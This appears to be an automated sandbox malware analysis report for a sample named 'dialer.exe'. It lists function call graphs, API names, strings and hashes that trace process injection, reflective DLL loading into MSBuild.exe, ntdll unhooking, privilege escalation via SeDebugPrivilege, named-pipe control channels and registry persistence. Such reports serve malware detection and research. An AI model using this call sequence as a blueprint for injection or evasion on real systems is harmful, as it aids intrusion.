                                                                          Function 000001160CA173B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316783010.000001160CA10000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca10000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: __std_exception_copy
                                                                          • String ID: Locator'$riptor at (
                                                                          • API String ID: 592178966-4215709766
                                                                          • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                          • Instruction ID: 7f79f916cc466bbc11b84d9897c8e972a5277db83b1fa8ed52cf4a51190c544d
                                                                          • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                          • Instruction Fuzzy Hash: 9EE08671A01B4480DF058F66D4501D87360E75CB64B889122DE4C46355EA38D5E5C300
                                                                          Function 000001160CA41BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316848167.000001160CA40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA40000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca40000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocFree
                                                                          • String ID:
                                                                          • API String ID: 756756679-0
                                                                          • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                          • Instruction ID: 975b2d68c81d0244af3f30b12e2b6496ad7a6602a13cf746120706274c7070cd
                                                                          • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                          • Instruction Fuzzy Hash: FC113A35611B8481EA58DB66A8082E967A1FBCDFC1F588168EF4D5776ADE3AC4C28300
                                                                          Function 000001160CA41268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316848167.000001160CA40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA40000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca40000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$AllocProcess
                                                                          • String ID:
                                                                          • API String ID: 1617791916-0
                                                                          • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                          • Instruction ID: c379e78445a7243494717b96d79580f3b466e813cc177712385685fd28dc66dd
                                                                          • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                          • Instruction Fuzzy Hash: F5E03935601B0486EB488B62D8083AA36E1FB8DB06F84C024DF0907755DF7E84D9C750

                                                                          Execution Graph

                                                                          Execution Coverage:48.5%
                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                          Signature Coverage:0%
                                                                          Total number of Nodes:226
                                                                          Total number of Limit Nodes:22
                                                                          execution_graph 384 140002b38 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 385 140002b8e K32EnumProcesses 384->385 386 140002beb SleepEx 385->386 387 140002ba3 385->387 386->385 387->386 389 140002540 387->389 390 140002558 389->390 391 14000254d 389->391 390->387 393 1400010c0 391->393 431 1400018ac OpenProcess 393->431 396 1400014ba 396->390 397 140001122 OpenProcess 397->396 398 14000113e OpenProcess 397->398 399 140001161 K32GetModuleFileNameExW 398->399 400 1400011fd NtQueryInformationProcess 398->400 401 1400011aa CloseHandle 399->401 402 14000117a PathFindFileNameW lstrlenW 399->402 403 1400014b1 CloseHandle 400->403 404 140001224 400->404 401->400 406 1400011b8 401->406 402->401 405 140001197 StrCpyW 402->405 403->396 404->403 407 140001230 OpenProcessToken 404->407 405->401 406->400 408 1400011d8 StrCmpIW 406->408 407->403 409 14000124e GetTokenInformation 407->409 408->403 408->406 410 1400012f1 409->410 411 140001276 GetLastError 409->411 412 1400012f8 CloseHandle 410->412 411->410 413 140001281 LocalAlloc 411->413 412->403 418 14000130c 412->418 413->410 414 140001297 GetTokenInformation 413->414 415 1400012df 414->415 416 1400012bf GetSidSubAuthorityCount GetSidSubAuthority 414->416 417 1400012e6 LocalFree 415->417 416->417 417->412 418->403 419 14000139b StrStrA 418->419 420 1400013c3 418->420 419->418 421 1400013c8 419->421 420->403 421->403 422 1400013f3 VirtualAllocEx 421->422 422->403 423 140001420 WriteProcessMemory 422->423 423->403 424 14000143b 423->424 436 14000211c 424->436 426 14000145b 426->403 427 140001478 WaitForSingleObject 426->427 430 140001471 CloseHandle 426->430 429 140001487 GetExitCodeThread 427->429 427->430 429->430 430->403 432 14000110e 431->432 433 1400018d8 IsWow64Process 431->433 432->396 432->397 434 1400018f8 CloseHandle 433->434 435 1400018ea 433->435 434->432 435->434 439 140001914 GetModuleHandleA 436->439 440 140001934 GetProcAddress 439->440 441 14000193d 439->441 440->441 442 140002bf8 443 140002c05 442->443 445 140002c25 ConnectNamedPipe 443->445 446 140002c1a Sleep 443->446 453 140001b54 AllocateAndInitializeSid 443->453 447 140002c83 Sleep 445->447 448 140002c34 ReadFile 445->448 446->443 450 140002c8e DisconnectNamedPipe 447->450 449 140002c57 448->449 448->450 460 140002524 449->460 450->445 454 140001bb1 SetEntriesInAclW 453->454 455 140001c6f 453->455 454->455 456 140001bf5 LocalAlloc 454->456 455->443 456->455 457 140001c09 InitializeSecurityDescriptor 456->457 457->455 458 140001c19 SetSecurityDescriptorDacl 457->458 458->455 459 140001c30 CreateNamedPipeW 458->459 459->455 461 140002531 460->461 462 140002539 WriteFile 460->462 463 1400010c0 30 API calls 461->463 462->450 463->462 464 140002258 467 14000226c 464->467 491 140001f2c 467->491 470 140001f2c 14 API calls 471 14000228f GetCurrentProcessId OpenProcess 470->471 472 140002321 FindResourceExA 471->472 473 1400022af OpenProcessToken 471->473 476 140002341 SizeofResource 472->476 477 140002261 ExitProcess 472->477 474 1400022c3 LookupPrivilegeValueW 473->474 475 140002318 CloseHandle 473->475 474->475 478 1400022da AdjustTokenPrivileges 474->478 475->472 476->477 479 14000235a LoadResource 476->479 478->475 480 140002312 GetLastError 478->480 479->477 481 14000236e LockResource GetCurrentProcessId 479->481 480->475 505 1400017ec GetProcessHeap HeapAlloc 481->505 483 14000238b RegCreateKeyExW 484 140002489 CreateThread GetProcessHeap HeapAlloc CreateThread CreateThread 483->484 485 1400023cc ConvertStringSecurityDescriptorToSecurityDescriptorW 483->485 486 14000250f SleepEx 484->486 487 1400023f4 RegSetKeySecurity LocalFree 485->487 488 14000240e RegCreateKeyExW 485->488 486->486 487->488 489 140002448 GetCurrentProcessId RegSetValueExW RegCloseKey 488->489 490 14000247f RegCloseKey 488->490 489->490 490->484 492 140001f35 StrCpyW StrCatW GetModuleHandleW 491->492 493 1400020ff 491->493 492->493 494 140001f86 GetCurrentProcess K32GetModuleInformation 492->494 493->470 495 1400020f6 FreeLibrary 494->495 496 140001fb6 CreateFileW 494->496 495->493 496->495 497 140001feb CreateFileMappingW 496->497 498 140002014 MapViewOfFile 497->498 499 1400020ed CloseHandle 497->499 500 1400020e4 CloseHandle 498->500 501 140002037 498->501 499->495 500->499 501->500 502 140002050 lstrcmpiA 501->502 504 14000208e 501->504 502->501 503 140002090 VirtualProtect VirtualProtect 502->503 503->500 504->500 511 1400014d8 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc K32EnumProcesses 505->511 507 140001885 GetProcessHeap HeapFree 508 140001830 508->507 509 140001851 OpenProcess 508->509 509->508 510 140001867 TerminateProcess CloseHandle 509->510 510->508 512 140001565 511->512 513 14000162f GetProcessHeap RtlFreeHeap GetProcessHeap RtlFreeHeap 511->513 512->513 514 14000157a OpenProcess 512->514 516 14000161a CloseHandle 512->516 517 1400015c9 ReadProcessMemory 512->517 513->508 514->512 515 140001597 K32EnumProcessModules 514->515 515->512 515->516 516->512 517->512 518 1400021d0 519 1400021dd 518->519 520 140001b54 6 API calls 519->520 521 1400021f2 Sleep 519->521 522 1400021fd ConnectNamedPipe 519->522 520->519 521->519 523 140002241 Sleep 522->523 524 14000220c ReadFile 522->524 525 14000224c DisconnectNamedPipe 523->525 524->525 526 14000222f 524->526 525->522 526->525 527 140002560 528 140002592 527->528 529 14000273a 527->529 530 1400026c6 GetProcessHeap HeapAlloc K32EnumProcesses 528->530 531 140002598 528->531 532 140002748 529->532 533 14000297e ReadFile 529->533 534 140002633 530->534 536 140002704 530->536 537 1400025a5 531->537 538 1400026bd ExitProcess 531->538 539 140002751 532->539 540 140002974 532->540 533->534 535 1400029a8 533->535 535->534 548 1400018ac 3 API calls 535->548 536->534 550 1400010c0 30 API calls 536->550 544 1400025ae 537->544 545 140002660 RegOpenKeyExW 537->545 541 140002919 539->541 542 14000275c 539->542 543 14000175c 22 API calls 540->543 549 140001944 ReadFile 541->549 546 140002761 542->546 547 14000279d 542->547 543->534 544->534 560 1400025cb ReadFile 544->560 551 1400026a1 545->551 552 14000268d RegDeleteValueW 545->552 546->534 609 14000217c 546->609 612 140001944 547->612 553 1400029c7 548->553 555 140002928 549->555 550->536 596 1400019c4 SysAllocString SysAllocString CoInitializeEx 551->596 552->551 553->534 564 1400029db GetProcessHeap HeapAlloc 553->564 565 140002638 553->565 555->534 567 140001944 ReadFile 555->567 559 1400026a6 604 14000175c GetProcessHeap HeapAlloc 559->604 560->534 562 1400025f5 560->562 562->534 574 1400018ac 3 API calls 562->574 570 1400014d8 13 API calls 564->570 576 140002a90 4 API calls 565->576 566 1400027b4 ReadFile 566->534 571 1400027dc 566->571 572 14000293f 567->572 587 140002a14 570->587 571->534 577 1400027e9 GetProcessHeap HeapAlloc ReadFile 571->577 572->534 578 140002947 ShellExecuteW 572->578 580 140002614 574->580 576->534 582 14000290b GetProcessHeap 577->582 583 14000282d 577->583 578->534 580->534 580->565 586 140002624 580->586 581 140002a49 GetProcessHeap 584 140002a52 HeapFree 581->584 582->584 583->582 588 140002881 lstrlenW GetProcessHeap HeapAlloc 583->588 589 14000285e 583->589 584->534 590 1400010c0 30 API calls 586->590 587->581 636 1400016cc 587->636 630 140002a90 CreateFileW 588->630 589->582 616 140001c88 589->616 590->534 597 140001a11 CoInitializeSecurity 596->597 598 140001b2c SysFreeString SysFreeString 596->598 599 140001a59 CoCreateInstance 597->599 600 140001a4d 597->600 598->559 601 140001b26 CoUninitialize 599->601 602 140001a88 VariantInit 599->602 600->599 600->601 601->598 603 140001ade 602->603 603->601 605 1400014d8 13 API calls 604->605 607 14000179a 605->607 606 1400017c8 GetProcessHeap HeapFree 607->606 608 1400016cc 5 API calls 607->608 608->607 610 140001914 2 API calls 609->610 611 140002191 610->611 613 140001968 ReadFile 612->613 614 14000198b 613->614 615 1400019a5 613->615 614->613 614->615 615->534 615->566 617 140001cbb 616->617 618 140001cce CreateProcessW 617->618 620 140001e97 617->620 622 140001e62 OpenProcess 617->622 624 140001dd2 VirtualAlloc 617->624 626 140001d8c WriteProcessMemory 617->626 618->617 619 140001d2b VirtualAllocEx 618->619 619->617 621 140001d60 WriteProcessMemory 619->621 620->582 621->617 622->617 623 140001e78 TerminateProcess 622->623 623->617 624->617 625 140001df1 GetThreadContext 624->625 625->617 627 140001e09 WriteProcessMemory 625->627 626->617 627->617 628 140001e30 SetThreadContext 627->628 628->617 629 140001e4e ResumeThread 628->629 629->617 629->620 631 1400028f7 GetProcessHeap HeapFree 630->631 632 140002ada WriteFile 630->632 631->582 633 140002b1c CloseHandle 632->633 634 140002afe 632->634 633->631 634->633 635 140002b02 WriteFile 634->635 635->633 637 140001745 636->637 638 1400016eb OpenProcess 636->638 637->581 638->637 639 140001703 638->639 640 14000211c 2 API calls 639->640 641 140001723 640->641 642 14000173c CloseHandle 641->642 643 140001731 CloseHandle 641->643 642->637 643->642

                                                                          Callgraph

                                                                          Executed Functions

                                                                          Function 000000014000226C Relevance: 61.4, APIs: 27, Strings: 8, Instructions: 165registrymemorythreadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000003E.00000002.3278631713.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000003E.00000002.3278334574.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000003E.00000002.3278899417.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000003E.00000002.3279073587.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: CreateProcess$Close$CurrentHandleResource$FileSecurityThread$DescriptorFreeHeapModuleOpenProtectTokenValueVirtual$AdjustAllocConvertErrorFindInformationLastLibraryLoadLocalLockLookupMappingPrivilegePrivilegesSizeofSleepStringViewlstrcmpi
                                                                          • String ID: D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$DLL$SOFTWARE\dialerconfig$SeDebugPrivilege$kernel32.dll$ntdll.dll$pid$svc64
                                                                          • API String ID: 4177739653-1130149537
                                                                          • Opcode ID: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                                                                          • Instruction ID: c2e61514e361dd61edc66d1a85693de1d2c237bf329a5b31df93bef4cff25afe
                                                                          • Opcode Fuzzy Hash: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                                                                          • Instruction Fuzzy Hash: B781E4B6200B4196EB26CF62F8547D977A9F78CBD8F44512AEB4A43A78DF38C148C740
                                                                          Function 00000001400010C0 Relevance: 51.0, APIs: 25, Strings: 4, Instructions: 257memorystringnativeCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 24 1400010c0-140001110 call 1400018ac 27 140001116-14000111c 24->27 28 1400014ba-1400014d6 24->28 27->28 29 140001122-140001138 OpenProcess 27->29 29->28 30 14000113e-14000115b OpenProcess 29->30 31 140001161-140001178 K32GetModuleFileNameExW 30->31 32 1400011fd-14000121e NtQueryInformationProcess 30->32 33 1400011aa-1400011b6 CloseHandle 31->33 34 14000117a-140001195 PathFindFileNameW lstrlenW 31->34 35 1400014b1-1400014b4 CloseHandle 32->35 36 140001224-14000122a 32->36 33->32 38 1400011b8-1400011d3 33->38 34->33 37 140001197-1400011a7 StrCpyW 34->37 35->28 36->35 39 140001230-140001248 OpenProcessToken 36->39 37->33 40 1400011d8-1400011ea StrCmpIW 38->40 39->35 41 14000124e-140001274 GetTokenInformation 39->41 40->35 42 1400011f0-1400011fb 40->42 43 1400012f1 41->43 44 140001276-14000127f GetLastError 41->44 42->32 42->40 45 1400012f8-140001306 CloseHandle 43->45 44->43 46 140001281-140001295 LocalAlloc 44->46 45->35 47 14000130c-140001313 45->47 46->43 48 140001297-1400012bd GetTokenInformation 46->48 47->35 51 140001319-140001324 47->51 49 1400012df 48->49 50 1400012bf-1400012dd GetSidSubAuthorityCount GetSidSubAuthority 48->50 52 1400012e6-1400012ef LocalFree 49->52 50->52 51->35 53 14000132a-140001334 51->53 52->45 53->35 54 14000133a-140001344 53->54 54->35 55 14000134a-14000138a call 140001ec4 * 3 54->55 55->35 62 140001390-1400013b0 call 140001ec4 StrStrA 55->62 65 1400013b2-1400013c1 62->65 66 1400013c8-1400013ed call 140001ec4 * 2 62->66 65->62 67 1400013c3 65->67 66->35 72 1400013f3-14000141a VirtualAllocEx 66->72 67->35 72->35 73 140001420-140001439 WriteProcessMemory 72->73 73->35 74 14000143b-14000145d call 14000211c 73->74 74->35 77 14000145f-140001467 74->77 77->35 78 140001469-14000146f 77->78 79 140001471-140001476 78->79 80 140001478-140001485 WaitForSingleObject 78->80 81 1400014ab CloseHandle 79->81 82 1400014a6 80->82 83 140001487-14000149b GetExitCodeThread 80->83 81->35 82->81 83->82 84 14000149d-1400014a3 83->84 84->82
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000003E.00000002.3278631713.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000003E.00000002.3278334574.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000003E.00000002.3278899417.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000003E.00000002.3279073587.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileLocalName$CodeCountErrorExitFindFreeLastMemoryModuleObjectPathQuerySingleThreadVirtualWaitWow64Writelstrlen
                                                                          • String ID: @$MSBuild.exe$ReflectiveDllMain$dialer.exe
                                                                          • API String ID: 2561231171-3753927220
                                                                          • Opcode ID: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                                                                          • Instruction ID: 2175fd9260984ecd3e092ef955109d5d50fbfcc0bf213717558b1eb8b1c9701c
                                                                          • Opcode Fuzzy Hash: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                                                                          • Instruction Fuzzy Hash: 40B138B260468186EB26DF27F8947E927A9FB8CBC4F404125AF4A477B4EF38C645C740
                                                                          Function 00000001400014D8 Relevance: 19.6, APIs: 13, Instructions: 130memoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000003E.00000002.3278631713.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000003E.00000002.3278334574.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000003E.00000002.3278899417.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000003E.00000002.3279073587.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
                                                                          • String ID:
                                                                          • API String ID: 4084875642-0
                                                                          • Opcode ID: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                                                                          • Instruction ID: 4858e5a3d965c592fcd1f5951e26bd94c88d4916acf90710a0b336d1aa1e032e
                                                                          • Opcode Fuzzy Hash: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                                                                          • Instruction Fuzzy Hash: E6519DB2711A819AEB66CF63E8587EA22A5F78DBC4F444025EF4947764DF38C545C700
                                                                          Function 0000000140001F2C Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 124filememorystringCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000003E.00000002.3278631713.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000003E.00000002.3278334574.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000003E.00000002.3278899417.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000003E.00000002.3279073587.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
                                                                          • String ID: .text$C:\Windows\System32\
                                                                          • API String ID: 2721474350-832442975
                                                                          • Opcode ID: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                                                                          • Instruction ID: 0b364bd3c89a37fdd3fa7b369e4888cbeb1e5b170dc00cf86e963973e9165d3d
                                                                          • Opcode Fuzzy Hash: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                                                                          • Instruction Fuzzy Hash: CC518BB2204B8096EB62CF16F8587DAB3A5F78CBD4F444525AF4A03B68DF38C549C700
                                                                          Function 0000000140002BF8 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 40sleepfilepipeCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000003E.00000002.3278631713.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000003E.00000002.3278334574.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000003E.00000002.3278899417.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000003E.00000002.3279073587.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                                                                          • String ID: M$\\.\pipe\dialerchildproc64
                                                                          • API String ID: 2203880229-3489460547
                                                                          • Opcode ID: 180580de56f56ab00dd4d516fca46f959342e05f281243e0c5337f45e18aa23b
                                                                          • Instruction ID: 6dc3dc8c0bd617ca7cbe615ebfcb02ed857a87361961821bc60a1768ee808972
                                                                          • Opcode Fuzzy Hash: 180580de56f56ab00dd4d516fca46f959342e05f281243e0c5337f45e18aa23b
                                                                          • Instruction Fuzzy Hash: C01139B1218A8492F716DB22F8047EE6764A78DBE0F444225BB66036F4DF7CC548C700
                                                                          Function 00000001400021D0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36sleeppipefileCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 129 1400021d0-1400021da 130 1400021dd-1400021f0 call 140001b54 129->130 133 1400021f2-1400021fb Sleep 130->133 134 1400021fd-14000220a ConnectNamedPipe 130->134 133->130 135 140002241-140002246 Sleep 134->135 136 14000220c-14000222d ReadFile 134->136 137 14000224c-140002255 DisconnectNamedPipe 135->137 136->137 138 14000222f-140002234 136->138 137->134 138->137 139 140002236-14000223f 138->139 139->137
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000003E.00000002.3278631713.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000003E.00000002.3278334574.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000003E.00000002.3278899417.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000003E.00000002.3279073587.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                                                                          • String ID: \\.\pipe\dialercontrol_redirect64
                                                                          • API String ID: 2071455217-3440882674
                                                                          • Opcode ID: 33f89feb9858a4e39e6e7226b1872fe8dc0a47489d7e71beaca7a62b826bfc15
                                                                          • Instruction ID: d66e41e89491d3fe39127ed5f8ff24c46c9ecc4af95d447005e5476a51c55f6d
                                                                          • Opcode Fuzzy Hash: 33f89feb9858a4e39e6e7226b1872fe8dc0a47489d7e71beaca7a62b826bfc15
                                                                          • Instruction Fuzzy Hash: 42014BB1204A40A2EA17EB63F8443E9B365A79DBE0F144235FB66476F4DF78C488C700
                                                                          Function 0000000140001B54 Relevance: 9.1, APIs: 6, Instructions: 82memorypipeCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000003E.00000002.3278631713.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000003E.00000002.3278334574.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000003E.00000002.3278899417.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000003E.00000002.3279073587.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                                                                          • String ID:
                                                                          • API String ID: 3197395349-0
                                                                          • Opcode ID: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                                                                          • Instruction ID: 21eaad2a8fcaa81d39f01622d1c01d05a8059e075f91819b3ade9b41c51f013a
                                                                          • Opcode Fuzzy Hash: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                                                                          • Instruction Fuzzy Hash: FA318D72215691CAE761CF25F490BDE77A5F748B98F40521AFB4947FA8EB78C208CB40
                                                                          Function 0000000140002B38 Relevance: 9.1, APIs: 6, Instructions: 58memoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 149 140002b38-140002b8c GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 150 140002b8e-140002ba1 K32EnumProcesses 149->150 151 140002ba3-140002bb2 150->151 152 140002beb-140002bf4 SleepEx 150->152 153 140002bb4-140002bb8 151->153 154 140002bdc-140002be7 151->154 152->150 155 140002bba 153->155 156 140002bcb-140002bce call 140002540 153->156 154->152 157 140002bbe-140002bc3 155->157 160 140002bd2 156->160 158 140002bc5-140002bc9 157->158 159 140002bd6-140002bda 157->159 158->156 158->157 159->153 159->154 160->159
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000003E.00000002.3278631713.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000003E.00000002.3278334574.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000003E.00000002.3278899417.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000003E.00000002.3279073587.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$AllocProcess$EnumProcessesSleep
                                                                          • String ID:
                                                                          • API String ID: 3676546796-0
                                                                          • Opcode ID: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                                                                          • Instruction ID: 9c67988e037e7d22bad9650836966df18df348572cafe7f0e6f30b42da554bff
                                                                          • Opcode Fuzzy Hash: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                                                                          • Instruction Fuzzy Hash: 3A115CB26006518AE72ACF17F85579A77A6F78DBC1F154028EB4607B68CF39D881CB40
                                                                          Function 00000001400017EC Relevance: 9.1, APIs: 6, Instructions: 55memoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetProcessHeap.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001801
                                                                          • HeapAlloc.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001812
                                                                            • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000150B
                                                                            • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000151E
                                                                            • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000152C
                                                                            • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000153D
                                                                            • Part of subcall function 00000001400014D8: K32EnumProcesses.KERNEL32 ref: 0000000140001557
                                                                            • Part of subcall function 00000001400014D8: OpenProcess.KERNEL32 ref: 0000000140001585
                                                                            • Part of subcall function 00000001400014D8: K32EnumProcessModules.KERNEL32 ref: 00000001400015AA
                                                                            • Part of subcall function 00000001400014D8: ReadProcessMemory.KERNELBASE ref: 00000001400015E1
                                                                            • Part of subcall function 00000001400014D8: CloseHandle.KERNELBASE ref: 000000014000161D
                                                                            • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000162F
                                                                            • Part of subcall function 00000001400014D8: RtlFreeHeap.NTDLL ref: 000000014000163D
                                                                            • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 0000000140001643
